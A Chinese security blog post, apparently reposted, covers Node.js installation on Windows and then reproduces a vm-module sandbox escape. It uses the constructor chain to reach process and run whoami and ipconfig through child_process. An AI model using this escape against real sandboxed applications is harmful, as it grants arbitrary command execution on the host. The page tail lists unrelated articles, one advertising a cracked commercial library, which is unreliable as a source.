安全杂记 - 复现nodejs沙箱绕过

目录

  • 一. 配置环境
    • 1.下载nodejs
    • 2.nodejs配置
    • 3.报错解决方法
  • 二. nodej沙箱绕过
    • 1. vm模块
    • 2.使用this或引用类型来进行沙箱绕过

一. 配置环境

1.下载nodejs

官网:https://nodejs.org/en

在这里插入图片描述

2.nodejs配置

安装nodejs的msi文件,默认配置一直下一步即可,以下步骤以默认安装为准,如有安装位置改变,请自行更改环境变量里面的配置。
继续进行环境变量的配置
用户变量如下
在这里插入图片描述
系统变量如下
在这里插入图片描述
编辑PATH添加如下
在这里插入图片描述
在默认安装位置新建如下两个文件
node_cache是放安装过程的缓存文件
node_global是存放安装模块配置位置
在这里插入图片描述
测试是否安装成功
在这里插入图片描述
继续执行如下命令

npm config set prefix "C:\Program Files\nodejs\node_global"
npm config set cache "C:\Program Files\nodejs\node_cache"

安装cluster进行测试

npm install cluster -g

3.报错解决方法

如有报错请尝试给nodejs默认安装目录提升用户权限来解决。

二. nodej沙箱绕过

1. vm模块

const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

运行结果
在这里插入图片描述

2.使用this或引用类型来进行沙箱绕过

this指向的是sandbox,我们可以获得一个tosString方法,通过toString方法来获得一个构造函数。
所有函数都是由Fuction创造出来的,我们的目的是拿到process模块
在这里插入图片描述
因为constructor本身指向它的构造函数,所以我们可以利用constructor函数,来拿到Function函数
沙盒逃逸就是要把外面的元素或者对象引入进来。
如下,此时是利用this

const vm = require('vm');
const script = `
const process = x.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;const sandbox = { m: [], n: {}, x:/regexp/};
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

我们把“x”替换为this也是可以成功执行的,此时m和n可以是任意.,这个是利用了引用类型比如{}。


const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()
`;const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

whoami成功执行,代表着此时已经可以任意命令执行
在这里插入图片描述
用户learnpc是我的管理员用户
在这里插入图片描述

比如我们这里在执行以下ipconfig来进行验证
在这里插入图片描述
以上便是经典的沙箱逃逸来执行命令,当我们可以执行命令的时候,便说明我们其实已经成功拿下。此时也可执行其他不好的命令。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/78620.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Wordpress升级版本后插件和主题常见出错及处理方法整理【持续更新】

Wordpress报错怎么解决? 一般常用的排查方法: 暂时禁用所有插件;将主题更改为默认主题; 修改wp-config.php文件;更新固定链接设置,确保设置正确;检查.htaccess文件是否存在且是否可写&#xf…

ant.design 组件库中的 Tree 组件实现可搜索的树: React+and+ts

ant.design 组件库中的 Tree 组件实现可搜索的树,在这里我会详细介绍每个方法,以及容易踩坑的点。 效果图: 首先是要导入的文件 // React 自带的属性 import React, { useMemo, useState } from react; // antd 组件库中的,输入…

了解Linux 的 mmap --- 笔记

学习这篇博客,进行了一些归纳Linux下mmap_linux mmap_一个山里的少年的博客-CSDN博客https://blog.csdn.net/qq_56999918/article/details/127070280 >>读取文件 读取文件方法:由操作系统提供的两个方法,read和write来读写文件。 由…

【SpringBoot】知识

.第一个程序HelloWorld 项目创建方式:使用 IDEA 直接创建项目 1、创建一个新项目 2、选择spring initalizr , 可以看到默认就是去官网的快速构建工具那里实现 3、填写项目信息 4、选择初始化的组件(初学勾选 Web 即可) 5、填…

flask中的应用上下文

flask中的应用上下文 Flask应用上下文主要包含两个对象:current_app和g。这两个对象在处理请求期间都是全局可访问的,但在每个请求结束时都会被重置。 current_app:这是当前激活的Flask应用的实例。在大多数情况下,你可以将其视为…

Git工具安装

Git 工具安装 1. 下载Git安装包2. 安装Git工具3. 简单的使用配置用户名 1. 下载Git安装包 打开官网 https://git-scm.com/downloads点击下载 2. 安装Git工具 右击以管理员身份运行 ![在这里插入图片描述](https://img-blog.csdnimg.cn/9a99a73d54824800bc87db64f71f7602.png…

Vue3状态管理库Pinia——自定义持久化插件

个人简介 👀个人主页: 前端杂货铺 🙋‍♂️学习方向: 主攻前端方向,正逐渐往全干发展 📃个人状态: 研发工程师,现效力于中国工业软件事业 🚀人生格言: 积跬步…

Codejock Skin Framework Visual C++ MFC Crack

Codejock Skin Framework Visual C MFC Crack Codejock Visual CMFC皮肤框架为Windows开发人员提供了一种高度复杂的应用程序皮肤框架技术,该技术是在考虑Windows主题(视觉样式)的情况下开发的。只需几行代码就可以实现一个完全主题化的应用程序。 功能概述 Codejoc…

【雕爷学编程】MicroPython动手做(30)——物联网之Blynk 4

知识点:什么是掌控板? 掌控板是一块普及STEAM创客教育、人工智能教育、机器人编程教育的开源智能硬件。它集成ESP-32高性能双核芯片,支持WiFi和蓝牙双模通信,可作为物联网节点,实现物联网应用。同时掌控板上集成了OLED…

Element的Dialog+Form使用问题

在Element的Dialog中使用表单时&#xff0c;可能会出现以下问题 无法清空表单校验 <el-dialog title"新建资产" :visible.sync"addAssetsFormVisible" close"resetForm(addAssets)">resetForm (formName) {this.$refs[formName].resetFie…

2023-8-6 成年人交朋友,只筛选不改造。

前段时候&#xff0c;把Ex和相关的人都删掉了&#xff0c;又起了一次棺材。上次棺材给掀开&#xff0c;是因为肉桂拉小群又把我们拉一块。 我睡醒的时候看到了一堆的消息&#xff0c;他遇到麻烦想投靠我&#xff0c;还说以后要跟我混。他只有在遇到麻烦&#xff0c;遇到换工作…

前端CSS文字阴影text-shadow记录

前端CSS文字阴影text-shadow记录 一、文字阴影 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>Doc…

【Redis】——AOF持久化

什么是AOF日志 AOF日志是redis为数据的持久化提供了的一个技术,日志里面记录着执行redis写命令。每当redis执行一条写命令的时候&#xff0c;就会将该命令记录 到AOF日志当中。当redis启动的时候&#xff0c;可以加载AOF日志中的所有指令&#xff0c;并执行这些指令恢复所有的…

Web3 solidity编写交易所合约 编写ETH和自定义代币存入逻辑 并带着大家手动测试

上文 Web3 叙述交易所授权置换概念 编写transferFrom与approve函数我们写完一个简单授权交易所的逻辑 但是并没有测试 其实也不是我不想 主要是 交易所也没实例化 现在也测试不了 我们先运行 ganache 启动一个虚拟的区块链环境 先发布 在终端执行 truffle migrate如果你跟着我…

使用WebMvcConfigurationSupport后导致原来返回的json数据变为了xml的解决方法

问题 未使用WebMvcConfigurationSupport拦截时返回的数据都是JSON格式&#xff0c;使用WebMvcConfigurationSupport做拦截后数据的返回变为了XML的格式。 原因 在Spring框架中&#xff0c;WebMvcConfigurationSupport 是一个类&#xff0c;它可以用于自定义Spring MVC的配置…

vue 标题文字字数过长超出部分用...代替 动态显示

效果: 浏览器最大化: 浏览器缩小: 代码: html: <div class"title overflow">{{item.name}}</div> <div class"content overflow">{{item.content}}</div> css: .overflow {/* 一定要加宽度 */width: 90%;/* 文字的大小 */he…

VB利用GDI+显示资源文件中的PNG文件

加载并打开资源文件&#xff0c;点击"添加自定义资源"&#xff0c;添加一个PNG文件&#xff0c;保存。 在代码编辑窗口复制粘贴以下代码,按F5运行后鼠标点击窗口即可显示资源文件中的PNG文件 Option Explicit Private Enum GpStatus Ok 0 GenericError 1 Invalid…

electron+vue+ts窗口间通信

文章目录 一. 目的二.逻辑分析三. 代码示例 "types/node": "^20.3.1","vitejs/plugin-vue": "^4.1.0","vueuse/electron": "^10.2.1","electron": "^25.2.0","electron-packager":…

DevOps在项目管理中的魔法:简化与深化

什么是DevOps&#xff1f; 定义与核心思想 DevOps, 这个名词&#xff0c;在技术领域中饱受瞩目。但它到底是什么&#xff1f;首先&#xff0c;DevOps并不仅仅是一个技术或者工具&#xff0c;它首先是一种文化&#xff0c;一种思想。DevOps是Development&#xff08;开发&#…

4,链表【p5】

链表 4.1哈希表简介4.2有序表简介4.3链表4.3.1例1-反转单向和双向链表4.3.2例2-打印两个有序链表的公共部分4.3.3面试时链表解题的方法论4.3.4例3-判断一个链表是否为回文结构4.3.4.1快慢指针 4.3.5例4-将单向链表按某值划分成左边小、中间相等、右边大的形式4.3.6例5-复制好友…